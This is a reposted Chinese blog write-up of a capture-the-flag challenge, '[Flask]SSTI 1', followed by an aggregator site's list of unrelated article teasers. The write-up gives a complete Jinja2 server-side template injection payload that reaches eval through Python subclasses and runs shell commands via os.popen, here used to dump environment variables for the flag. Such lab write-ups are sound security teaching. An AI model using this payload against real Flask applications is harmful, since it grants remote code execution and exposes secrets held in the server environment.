[Flask]SSTI 1

news/2024/11/15 10:15:48/文章来源:https://www.cnblogs.com/tazmi/p/18547439

[Flask]SSTI 1

根据题目判断这是一道SSTI参数处理不当的漏洞,打开页面显示Hello guest,猜测参数名为user

image-20241105075729539

发现页面无任何变化,于是尝试name,成功回显

image-20241105075804670

尝试{{2*2}},页面显示4,存在SSTI注入

image-20241105075944435

构造payload,成功执行任意代码

# payload的解释:获取eval函数并执行任意代码?name={% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("任意代码执行的地方").read()') }}{% endif %}{% endif %}{% endfor %}
{% endif %}
{% endfor %}

image-20241105080505597

查看根目录(ls /),未发现flag文件,便猜测在env环境里面,成功找到flag

?name={% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("env").read()') }}{% endif %}{% endif %}{% endfor %}
{% endif %}
{% endfor %}

image-20241105080921453

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/833883.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

凯宇星辉:CRM助力实现数字化“领跑”转型

凯宇星辉:CRM助力实现数字化“领跑”转型

近日,第14届中国轻工业信息化大会及智能居家展洽会在重庆举行。会上同步发布了中国轻工业数字化转型“领跑者”相关案例成果287项,涉及家电、五金、照明、酿酒食品等行业,其中,纷享销客合作客户辽宁凯宇星辉实业集团有限公司(以下简称“凯宇星辉”)提报的《基于CRM系统的…
阅读更多...
零售行业的高效法宝:项目管理软件的应用与选择

零售行业的高效法宝:项目管理软件的应用与选择

在零售行业,团队协作的效率直接影响到市场反应速度和客户满意度。商品的上下架、库存管理、促销活动的策划与执行、跨部门的沟通与协作……每一个环节都需要精准的协调。而在这些纷繁复杂的任务中,项目管理软件正成为零售行业的关键工具,帮助团队理清思路、优化流程、提升执…
阅读更多...
关于从其他程序切回word文档时卡顿问题的解决办法

关于从其他程序切回word文档时卡顿问题的解决办法

1.点击其他命令 2.点击加载项,选择对应的加载项,点击转到 3.如下图操作后,重启word即可 原文地址:https://blog.csdn.net/qq_45603855/article/details/115732189
阅读更多...
ABB机器人DSQC639主板维修

ABB机器人DSQC639主板维修

ABB机器人的主板,作为这一高科技产物的中枢大脑,其出色的稳定性和可靠性无疑是确保机器人能够高效、持续运作的关键所在。一旦主板遭遇故障,整个机器人的运行将可能陷入瘫痪状态,严重影响生产效率与质量。以下,将深入探讨几种常见的ABB机器人主板故障及其相应的解决之道:…
阅读更多...
前端开发中怎么把链接转为二维码并展示?

前端开发中怎么把链接转为二维码并展示?

前端开发中我们应该怎么把一个通过代码生成二维码并展示呢?前言: 把一个链接生成一个二维码图片,这是我们前端非常常见的一个需求。那么我们应该如何做呢? 查看往期文章: 五分钟一百行代码,手写一个vue项目全局通用的toast提示组件 十五分钟两百行代码,手写一个vue项目全…
阅读更多...
数字型注入(post)

数字型注入(post)

数字型注入(post) 打开靶场,发现数字列表查询,点击查询发现POST请求和id、submit参数bp抓包,根据题目数字注入提示,尝试用1+1方式查询,+编码为%2B id=1%2B1&submit=%E6%9F%A5%E8%AF%A2成功回显 order by查询字段数,在为3的时候回显异常,判断字段数为2查库,查出数据…
阅读更多...
设备管理系统功能拆解——设备报修维修管理

设备管理系统功能拆解——设备报修维修管理

在生产过程中,设备的高效运作是确保生产顺利进行的重要基础。但是运行时间长了,设备难免会出现故障,如何高效地进行报修和维修管理,成为每个企业必须面对的问题。 通过有效的报修维修管理,企业可以快速响应设备故障,合理分配资源,从而最大限度地减少停机时间。这篇我们将…
阅读更多...
设备管理系统功能拆解——设备维护保养管理

设备管理系统功能拆解——设备维护保养管理

设备维护保养是企业日常运营中不可忽视的一环,无论是生产设备还是办公设备,都需要定期的维护和保养,以确保其正常运行。 设备维护保养的管理,不仅仅是日常工作,更是保障企业生产效率和设备寿命的关键,系统化管理维护保养工作可以显著提高设备的可靠性和使用寿命。 那么,…
阅读更多...
Django框架表单基础

Django框架表单基础

本节主要介绍一下Django框架表单(Form)的基础知识。Django框架提供了一系列的工具和库来帮助设计人员构建表单,通过表单来接收网站用户的输入,然后处理以及响应这些用户的输入。 6.1.1 HTML表单 Django框架表单是在HTML模板中设计完成的,其实类似于传统HTML Form表单的应用…
阅读更多...
zkw 线段树-原理及其扩展

zkw 线段树-原理及其扩展

前言许多算法的本质是统计。线段树用于统计,是沟通原数组与前缀和的桥梁。 《统计的力量》清华大学-张昆玮关于线段树 前置知识:线段树 OIWiki。 线段树是一种专门维护区间问题的数据结构。 线段树对信息进行二进制化处理并在树形结构上维护,以此让处理速度达到 \(O(\log{n}…
阅读更多...
读数据质量管理:数据可靠性与数据质量问题解决之道04收集与清洗

读数据质量管理:数据可靠性与数据质量问题解决之道04收集与清洗

收集和清洗1. 收集数据 1.1. 数据收集和清洗是生产管道中的第一步1.1.1. 数据转换和测试则在生产管道中解决数据质量问题1.2. 在收集数据时,管道的任何地方可能都没有入口点重要,因为入口点是任何数据管道中最上游的位置 1.3. 入口点…
阅读更多...
光灵斗域游戏开发需求分析报告

光灵斗域游戏开发需求分析报告

墨刀原型链接 项目简介 需求分析 数据流图原型设计 分工说明
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023